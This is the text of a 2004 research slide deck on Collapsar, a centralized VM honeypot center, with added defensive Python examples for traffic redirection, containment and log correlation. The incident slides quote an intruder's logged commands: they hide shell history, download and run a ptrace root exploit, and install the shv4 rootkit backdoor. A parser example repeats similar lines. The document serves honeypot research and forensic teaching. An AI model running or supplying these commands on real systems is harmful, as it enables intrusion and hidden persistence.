Collapsar: A VM-Based Architecture for Network Attack Detention Center
Xuxian Jiang, Dongyan Xu
Department of Computer Sciences
Center for Education and Research in Information Assurance and Security (CERIAS)
Purdue University
USENIX Security 2004
Outline
Motivation
Collapsar architecture and features
Collapsar design, implementation, and performance
Collapsar deployment and real-world incidents
Conclusion and on-going work
Motivation
Need for network attack containment and monitoring
  Worm outbreaks (MSBlaster, Sasser, ...)
  Debian project servers hacked (Nov. 2003)
  PlanetLab nodes compromised (Dec. 2003)
  And more
Motivation
Promise of honeypots
  Providing insights into intruders' motivations, tactics, and tools
  Highly concentrated datasets with low noise
  Low false-positive and false-negative rates
  Discovering unknown vulnerabilities/exploitations
    Example: CERT advisory CA-2002-01 (Solaris CDE subprocess control daemon, dtspcd)
Current Honeypot Operation
Individual honeypots
  Limited local view of attacks
Federation of distributed honeypots
  Deploying honeypots in different networks
  Exchanging logs and alerts
Problems
  Difficulties in distributed management
  Lack of honeypot expertise
  Inconsistency in security and management policies
    Example: log format, sharing policy, exchange frequency
Our Solution: Collapsar
Based on the HoneyFarm idea of Lance Spitzner
Achieving two (seemingly) conflicting goals
  Distributed honeypot presence
  Centralized honeypot operation
Key ideas
  Leveraging unused IP addresses in each network
  Diverting the corresponding traffic to a "detention" center (transparently)
  Creating VM-based honeypots in the center
Collapsar Architecture
(Figure) An Attacker reaches unused addresses in several Production Networks; a Redirector in each network forwards that traffic to the Collapsar Center, where the Front-End dispatches it to VM-based Honeypots; a Correlation Engine and a Management Station complete the center.
Comparison with Current Approaches
Overlay-based approach (e.g., NetBait, Domino overlay)
  Honeypots deployed in different sites
  Logs aggregated from distributed honeypots
  Data mining performed on the aggregated log information
  Key difference: where the attacks take place (on-site vs. off-site)
Comparison with Current Approaches
Sinkhole networking approach (e.g., iSink)
  "Dark" address space to monitor Internet abnormality and commotion (e.g., MSBlaster worms)
  Limited interaction for better scalability
  Key difference: contiguous large address blocks (vs. scattered addresses)
Comparison with Current Approaches
Low-interaction approach (e.g., honeyd, iSink)
  Highly scalable deployment
  Low security risks
  Key difference: emulated services (vs. real things)
    Less effective at revealing unknown vulnerabilities
    Less effective at capturing 0-day worms
Collapsar Design
Functional components
  Redirector
  Collapsar Front-End
  Virtual honeypots
Assurance modules
  Logging module
  Tarpitting module
  Correlation module
Functional Components: Redirector
Running in each participating network
Capturing traffic toward unused IP addresses
Redirecting it to the Collapsar Front-End
Two implementation options
  Proxy-ARP approach (the redirector answers ARP requests for the unused addresses and forwards the traffic itself)
    Minimum change to the network infrastructure
    Longer latency
  GRE (Generic Routing Encapsulation) approach (the router tunnels the traffic to the Front-End)
    Lower latency
    Requires router re-configuration
    Misses attack traffic originating inside the domain (it never crosses the router)
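The two redirection options above, as an added example that is not Collapsar's own code: a proxy-ARP responder that only ever claims addresses on an explicit unused-address list, and the GRE encapsulation (RFC 2784, minimal header) that the router-based option uses to ship a captured packet to the Front-End, with the Front-End's validation on the way back out. Everything is built over constructed frames; the claim list, the MAC addresses and the documentation-range IPs are assumptions, not values from the paper.

```python
# Added example (not Collapsar's own code): the two redirector options on the
# slide, proxy ARP and GRE, over constructed frames. Addresses are from the
# RFC 5737 documentation ranges; the claim list and MAC addresses are assumptions.
import ipaddress
import struct

ETH_P_IP, ETH_P_ARP = 0x0800, 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
IPPROTO_GRE = 47

UNUSED_ADDRS = {ipaddress.IPv4Address("192.0.2.10"), ipaddress.IPv4Address("192.0.2.11")}
REDIRECTOR_MAC = bytes.fromhex("020000000001")       # locally administered, constructed
REDIRECTOR_IP = ipaddress.IPv4Address("192.0.2.2")
FRONTEND_IP = ipaddress.IPv4Address("203.0.113.5")


def build_arp_frame(oper, sha, spa, tha, tpa, eth_dst):
    """Ethernet II frame carrying one ARP message (RFC 826 field order)."""
    eth = eth_dst + sha + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, ETH_P_IP, 6, 4, oper, sha, spa.packed, tha, tpa.packed)
    return eth + arp


def proxy_arp_reply(frame):
    """Option 1: answer who-has requests for unused addresses so the LAN hands their
    traffic to the redirector. Returns the reply frame, or None when the frame is not
    a request for an address on the claim list. Working at layer 2, this also sees
    attacks launched from inside the network, at the cost of an extra forwarding hop."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen, oper) != (1, ETH_P_IP, 6, 4, ARP_REQUEST):
        return None
    target = ipaddress.IPv4Address(tpa)
    if target not in UNUSED_ADDRS:
        return None          # a live host owns it: never shadow a production address
    return build_arp_frame(ARP_REPLY, REDIRECTOR_MAC, target, sha, ipaddress.IPv4Address(spa), eth_dst=sha)


def inet_checksum(data):
    """RFC 1071 one's-complement sum; 0 when run over a header whose checksum is valid."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_ipv4(src, dst, proto, payload, ttl=64):
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, ttl, proto, 0, src.packed, dst.packed)
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:] + payload


def gre_encapsulate(inner_packet):
    """Option 2: wrap the captured packet in a minimal GRE header (RFC 2784: no checksum,
    key or sequence) addressed to the Front-End. The router forwards it like any other
    packet (lower latency), but a router only sees packets that cross it, which is the
    blind spot for attacks that stay inside the domain."""
    gre_header = struct.pack("!HH", 0x0000, ETH_P_IP)   # C=0, version 0, IPv4 payload
    return build_ipv4(REDIRECTOR_IP, FRONTEND_IP, IPPROTO_GRE, gre_header + inner_packet)


def gre_decapsulate(packet):
    """Front-End side: verify the outer IPv4 and GRE headers, then hand back the original
    packet untouched so the honeypot still sees the attacker's real source address."""
    if len(packet) < 24 or packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (packet[0] & 0x0F) * 4
    if ihl < 20 or len(packet) < ihl + 4 or packet[9] != IPPROTO_GRE or inet_checksum(packet[:ihl]):
        raise ValueError("outer header is not a valid IPv4/GRE header")
    flags, proto = struct.unpack("!HH", packet[ihl:ihl + 4])
    if flags & 0x7C07 or proto != ETH_P_IP:     # reserved bits 1-5 set, version != 0, or not IPv4
        raise ValueError("unsupported GRE header")
    gre_len = 4
    if flags & 0x8000:                          # C bit: checksum spans GRE header + payload
        gre_len = 8
        if inet_checksum(packet[ihl:]):
            raise ValueError("bad GRE checksum")
    inner = packet[ihl + gre_len:]
    if len(inner) < 20 or struct.unpack("!H", inner[2:4])[0] != len(inner):
        raise ValueError("inner packet is not a complete IPv4 datagram")
    return inner


def demo():
    """Walk both options over constructed input and return what an operator would inspect."""
    requester_mac, requester_ip = bytes.fromhex("02000000aaaa"), ipaddress.IPv4Address("192.0.2.1")

    def who_has(target):
        return build_arp_frame(ARP_REQUEST, requester_mac, requester_ip, b"\x00" * 6,
                               ipaddress.IPv4Address(target), eth_dst=b"\xff" * 6)

    attack = build_ipv4(ipaddress.IPv4Address("198.51.100.7"), ipaddress.IPv4Address("192.0.2.10"),
                        6, b"\x04\xd2\x00\x50" + b"\x00" * 16)      # a TCP segment for port 80
    tunnelled = gre_encapsulate(attack)
    return {"reply": proxy_arp_reply(who_has("192.0.2.10")),        # claimed address: answered
            "no_reply": proxy_arp_reply(who_has("192.0.2.1")),      # live address: silence
            "attack": attack, "tunnelled": tunnelled, "recovered": gre_decapsulate(tunnelled)}
```

The check in `proxy_arp_reply` that the target is on the claim list is the one that matters operationally: a redirector that answers for any unanswered request would hijack traffic for hosts that are merely slow to respond, and the "minimum change to the infrastructure" advantage turns into an outage. On the GRE side the inner packet is handed on with its original source address, which is what lets the honeypot and the logs record the real attacker rather than the redirector.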
Functional Components: Collapsar Front-End
Dispatching incoming traffic to different honeypots
  Transparent bridging
Mitigating security risks
  Transparent firewalling
  Packet re-writing
Assurance module plug-in
  Logging modules
  Tarpitting modules
Functional Components: Virtual Honeypots
VM-based high-interaction honeypots
  VMware
  Enhanced User-Mode Linux (UML)
Commodity OS and popular services
  Linux, Windows, Solaris, FreeBSD
  Apache, samba, sendmail, named
Capability of forensic analysis
  System image snapshot / restoration
Assurance Modules
Logging module
  Traffic logging (e.g., tcpdump, snort); where: Front-End and honeypots
  Keystroke logging (e.g., sebek); where: honeypots
Tarpitting module (e.g., snort-inline)
  Mitigating security risks; where: Front-End
Correlation module
  Mining and correlation
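The Front-End duties described on the two slides above (dispatch by transparent bridging, transparent firewalling and packet re-writing, with the tarpitting module sitting at the Front-End), as an added example that is not Collapsar's own code: a small policy engine over constructed packets. The honeypot table, the outbound connection budget and the rewrite signature (the `/bin/sh` to `/ben/sh` defanging in the style of snort-inline's equal-length `replace`) are assumptions chosen for illustration, not the paper's configuration.

```python
# Added example (not Collapsar's own code): the Front-End's dispatch and data
# control, i.e. transparent firewalling and packet re-writing, as a small policy
# engine over constructed packets. The honeypot table, connection budget and
# rewrite signature are assumptions chosen for illustration.
from collections import defaultdict, deque
from dataclasses import dataclass

TCP, SYN = 6, 0x02


@dataclass(frozen=True)
class Packet:
    ts: float            # seconds since capture start
    src: str
    dst: str
    proto: int = TCP
    dport: int = 0
    flags: int = 0
    payload: bytes = b""


# Transparent bridging: each VM is configured with the very address the
# redirector claimed, so dispatch is a lookup on the destination address.
HONEYPOTS = {"192.0.2.10": "vm-apache-linux", "192.0.2.11": "vm-winxp"}

# Packet re-writing in the spirit of snort-inline's replace: defang a payload
# leaving a honeypot so a third party is not exploited, keeping the length
# unchanged so TCP sequence numbers still line up and the attacker sees nothing.
REWRITES = {b"/bin/sh": b"/ben/sh"}


class FrontEnd:
    def __init__(self, max_new_connections=3, window_seconds=3600.0):
        self.max_new = max_new_connections
        self.window = window_seconds
        self._syn_times = defaultdict(deque)     # honeypot address -> recent SYN times

    def dispatch_inbound(self, pkt):
        """Honeypot that receives the packet, or None: traffic for an address
        with no VM behind it is dropped rather than answered by the Front-End."""
        return HONEYPOTS.get(pkt.dst)

    def control_outbound(self, pkt):
        """Fate of a packet leaving a honeypot: ('allow', pkt), ('rewrite', new_pkt)
        or ('drop', None). New TCP connections are budgeted per honeypot over a
        sliding window, which is what stops a compromised VM from scanning or
        spreading a worm while still letting the intruder fetch his tools."""
        if pkt.src not in HONEYPOTS:
            return "drop", None                   # not one of ours: never bridge it out
        if pkt.proto == TCP and pkt.flags & SYN:
            times = self._syn_times[pkt.src]
            while times and pkt.ts - times[0] >= self.window:
                times.popleft()
            if len(times) >= self.max_new:
                return "drop", None               # budget spent: outbreak contained
            times.append(pkt.ts)
        payload = pkt.payload
        for needle, replacement in REWRITES.items():
            payload = payload.replace(needle, replacement)
        if payload != pkt.payload:
            return "rewrite", Packet(pkt.ts, pkt.src, pkt.dst, pkt.proto,
                                     pkt.dport, pkt.flags, payload)
        return "allow", pkt


def demo():
    """Run constructed traffic through the policy and return the verdicts."""
    fe = FrontEnd(max_new_connections=3, window_seconds=3600.0)
    hp = "192.0.2.10"
    burst = [fe.control_outbound(Packet(float(t), hp, "198.51.100.%d" % t, TCP, 445, SYN))[0]
             for t in range(4)]                   # four SYNs in four seconds: scan-like
    later = fe.control_outbound(Packet(3601.0, hp, "198.51.100.9", TCP, 445, SYN))[0]
    verdict, out = fe.control_outbound(Packet(5.0, hp, "198.51.100.1", TCP, 80, 0x18,
                                              b"GET /x HTTP/1.0\r\n/bin/sh -c id"))
    return {"inbound": fe.dispatch_inbound(Packet(0.0, "198.51.100.7", hp, TCP, 80, SYN)),
            "unknown": fe.dispatch_inbound(Packet(0.0, "198.51.100.7", "192.0.2.99")),
            "burst": burst, "later": later, "rewrite": (verdict, out.payload)}
```

The budget is deliberately small and per honeypot: an intruder who has just gained a shell typically opens one or two outbound connections to fetch a kit, while a worm or a scanner opens hundreds, so the limit separates the two without tipping the intruder off the way a hard outbound block would.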
Performance Measurement
Measurement set-up (figure): the attacker A, the Redirector, the Front-End and a honeypot H (VMware or UML) in the Collapsar Center, hosted on two Dell PowerEdge servers (2.6GHz Xeon/2GB memory) and two Dell desktop PCs (1.8GHz Pentium 4/768MB memory)
Metrics
  TCP throughput
  ICMP latency
Tool: Nock (http://www.cs.wisc.edu/~zandy/p/nock)
Measurement Results
TCP throughput (figure)
Measurement Results
ICMP latency (figure)
Collapsar Deployment
Deployed in a local environment for a two-month period in 2003
Traffic redirected from five networks
  Three wired LANs
  One wireless LAN
  One DSL network
~40 honeypots analyzed so far
  Internet worms (MSBlaster, Enbiei, Nachi)
  Interactive intrusions (Apache, Samba)
  OS: Windows, Linux, Solaris, FreeBSD
Incident: Apache Honeypot/VMware
Vulnerabilities
  Vul 1: Apache chunk handling (CERT CA-2002-17), remote, yields the apache account
  Vul 2: Linux kernel ptrace (CERT VU#628849), local, yields root
Time-line
  Deployed: 23:44:03, 11/24/03
  Compromised: 09:33:55, 11/25/03 (under ten hours later)
Attack monitoring
  Detailed log: http://www.cs.purdue.edu/homes/jiangx/collapsar
Incident: Apache Honeypot/VMware
1. Gaining a regular account: apache
[2003-11-25 09:33:55 aaa.bb.c.126 7817 sh 48]export HISTFILE=/dev/null; echo; echo ' >>>> GAME OVER! Hackerz Win ;) <<<<'; echo; echo; echo "****** I AM IN '`hostname -f`' ******"; echo; if [ -r /etc/redhat-release ]; then echo `cat /etc/redhat-release`; elif [ -r /etc/suse-release ]; then echo SuSe `cat /etc/suse-release`; elif [ -r /etc/slackware-version ]; then echo Slackware `cat /etc/slackware-version`; fi; uname -a; id; echo
2. Escalating to the root privilege
[2003-11-25 09:34:01 aaa.bb.c.126 7817 sh 48]cd /tmp
[2003-11-25 09:34:07 aaa.bb.c.126 7817 sh 48]wget http://xxxxxxxxxxxxxxxxxxxxx.xx/0304-exploits/ptrace-kmod.c;gcc ptrace-kmod.c -o p;./p
Incident: Apache Honeypot/VMware
3. Installing a set of backdoors (the shv4 rootkit)
[2003-11-25 09:35:46 aaa.bb.c.126 7838 sh 0]wget http://xxxxxxx.xx.xx/vip/xxxxxx/shv4.tar.gz;tar -xzf shv4.tar.gz;cd shv4;./setup rooter 1985
[2003-11-25 09:36:16 aaa.bb.c.126 8009 xntps 0]SSH-1.5-PuTTY-Release-0.53b
4. Adding the ftpd user and installing an IRC-based file server (iroffer)
[2003-11-25 09:36:57 aaa.bb.c.126 8009 xntps 0]cd /home;adduser ftpd;su ftpd
[2003-11-25 09:37:00 aaa.bb.c.126 8009 xntps 0]cd ftpd;mkdir .logs;cd .logs
[2003-11-25 09:37:04 aaa.bb.c.126 8009 xntps 0]wget http://xxxxxxx.xxx/archive/v1.2/iroffer1.2b22.tgz;tar -zvxf iroffer1.2b22.tgz;cd iroffer1.2b22;./Configure;make
[2003-11-25 09:37:50 aaa.bb.c.126 8009 xntps 0]mv iroffer syst
[2003-11-25 09:37:52 aaa.bb.c.126 8009 xntps 0]pico rpm
[2003-11-25 09:38:01 aaa.bb.c.126 8009 xntps 0]./syst -b rpm/dev/null &
Incident: Windows XP Honeypot/VMware
Vulnerability: RPC DCOM (Microsoft Security Bulletin MS03-026)
Time-line
  Deployed: 22:10:00, 11/26/03
  MSBlaster: 00:36:47, 11/27/03
  Enbiei: 01:48:57, 11/27/03
  Nachi: 07:03:55, 11/27/03
Log Correlation: Stepping Stone
iii.jjj.kkk.11 compromised a honeypot and installed a rootkit, which contained an ssh backdoor
xx.yyy.zzz.3 connected to the ssh backdoor using the same password
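The keystroke logs on the Apache incident slides and the stepping-stone correlation above, as an added example that is not Collapsar's own code: a parser for the bracketed log form the slides show, a privilege-escalation check (unprivileged uid followed by root-level keystrokes on the same honeypot), extraction of the backdoor password and port from the rootkit's setup command, and a join against connection records to find every source that used the backdoor after it was installed. The bracketed fields are read as timestamp, honeypot address, pid, process name and uid, which fits the slides' own annotations (uid 48, the apache account, before the ptrace exploit; 0 afterwards), and `./setup <password> <port>` is assumed to be how the shv4 kit configures its ssh backdoor. The log lines, the addresses and the connection records are constructed to mirror the incident, not copied from the paper's data.

```python
# Added example (not Collapsar's own code): a parser for keystroke logs in the
# bracketed form shown on the incident slides, plus the checks an analyst runs
# over them. The bracketed fields are read as timestamp, honeypot address, pid,
# process name and uid (fits the slides' annotations: uid 48 = apache before the
# ptrace exploit, 0 afterwards). Log lines, addresses and connection records are
# constructed to mirror the incident.
import re
from datetime import datetime

LINE_RE = re.compile(r"^\[(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (\S+) (\d+) (\S+) (\d+)\](.*)$")
# Assumption about the shv4 kit: './setup <password> <port>' configures its ssh backdoor.
SETUP_RE = re.compile(r"\./setup\s+(\S+)\s+(\d+)")

KEYSTROKE_LOG = """\
[2003-11-25 09:33:55 192.0.2.126 7817 sh 48]export HISTFILE=/dev/null; uname -a; id
[2003-11-25 09:34:07 192.0.2.126 7817 sh 48]cd /tmp;wget http://example.invalid/ptrace-kmod.c;gcc ptrace-kmod.c -o p;./p
[2003-11-25 09:35:46 192.0.2.126 7838 sh 0]wget http://example.invalid/shv4.tar.gz;tar -xzf shv4.tar.gz;cd shv4;./setup rooter 1985
[2003-11-25 09:36:16 192.0.2.126 8009 xntps 0]SSH-1.5-PuTTY-Release-0.53b
[2003-11-25 09:36:57 192.0.2.126 8009 xntps 0]cd /home;adduser ftpd;su ftpd
"""

# (timestamp, src, dst, dport) as pulled from the Front-End's tcpdump log; constructed.
CONNECTIONS = [
    ("2003-11-25 09:33:50", "198.51.100.11", "192.0.2.126", 80),    # exploit delivered to Apache
    ("2003-11-25 09:36:16", "198.51.100.11", "192.0.2.126", 1985),  # installer tries the new backdoor
    ("2003-11-26 14:02:31", "203.0.113.3", "192.0.2.126", 1985),    # a second host uses it a day later
]


def when(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def parse_keystrokes(text):
    """One dict per well-formed line; lines that do not match the format are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, host, pid, proc, uid, cmd = m.groups()
            records.append({"ts": when(ts), "host": host, "pid": int(pid),
                            "proc": proc, "uid": int(uid), "cmd": cmd})
    return records


def privilege_escalations(records):
    """Per honeypot, the first root-level keystroke that follows activity under an
    unprivileged uid, with the last unprivileged command (the likely local exploit)."""
    found, last_unpriv = [], {}
    for r in sorted(records, key=lambda r: r["ts"]):
        if r["uid"] != 0:
            last_unpriv[r["host"]] = r
        elif r["host"] in last_unpriv:
            prev = last_unpriv.pop(r["host"])
            found.append({"host": r["host"], "from_uid": prev["uid"],
                          "at": r["ts"], "exploit_cmd": prev["cmd"]})
    return found


def backdoor_installs(records):
    """Root-level setup commands that configure an ssh backdoor: password and port."""
    found = []
    for r in records:
        m = SETUP_RE.search(r["cmd"])
        if m and r["uid"] == 0:
            found.append({"host": r["host"], "password": m.group(1),
                          "port": int(m.group(2)), "installed": r["ts"]})
    return found


def stepping_stones(backdoors, connections):
    """Join keystroke and network logs: every distinct source that reached a backdoor
    port after its installation. The first is taken to be the installer; any later,
    different source is a stepping-stone candidate (the password was shared, or the
    intruder moved to another host)."""
    result = {}
    for bd in backdoors:
        hits = sorted((when(t), src) for t, src, dst, port in connections
                      if dst == bd["host"] and port == bd["port"] and when(t) >= bd["installed"])
        sources = list(dict.fromkeys(src for _, src in hits))     # ordered, de-duplicated
        if sources:
            result[(bd["host"], bd["port"])] = {"installer": sources[0], "others": sources[1:]}
    return result


def demo():
    records = parse_keystrokes(KEYSTROKE_LOG)
    backdoors = backdoor_installs(records)
    return {"records": len(records), "escalations": privilege_escalations(records),
            "backdoors": backdoors, "stepping_stones": stepping_stones(backdoors, CONNECTIONS)}
```

The join is where the centralized operation pays off: the password and port come out of the keystroke log captured inside the VM, the connecting sources out of the traffic log captured at the Front-End, and because both are held in one place, with one log format, the correlation is a few lines rather than a negotiation between sites.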
Log Correlation: Network Scanning (figure)
Conclusions
A new architecture for attack containment and monitoring
  Distributed presence and centralized operation of honeypots
  Good potential in attack correlation and log mining
Unique features
  Aggregation of scattered unused IP addresses
  Off-site (relative to participating networks) attack occurrences and monitoring
  Real services for unknown vulnerability revelation
On-going Work
Integration into trusted server architectures (SODA and Poly2)
On-demand honeypot customization
Collapsar center federation
Scalability
Testbed for worm containment (coming soon)
Thank you.
For more information:
Email: {dxu, jiangx}@cs.purdue.edu
URL: www.cs.purdue.edu/~dxu
Google: “Purdue Collapsar friends”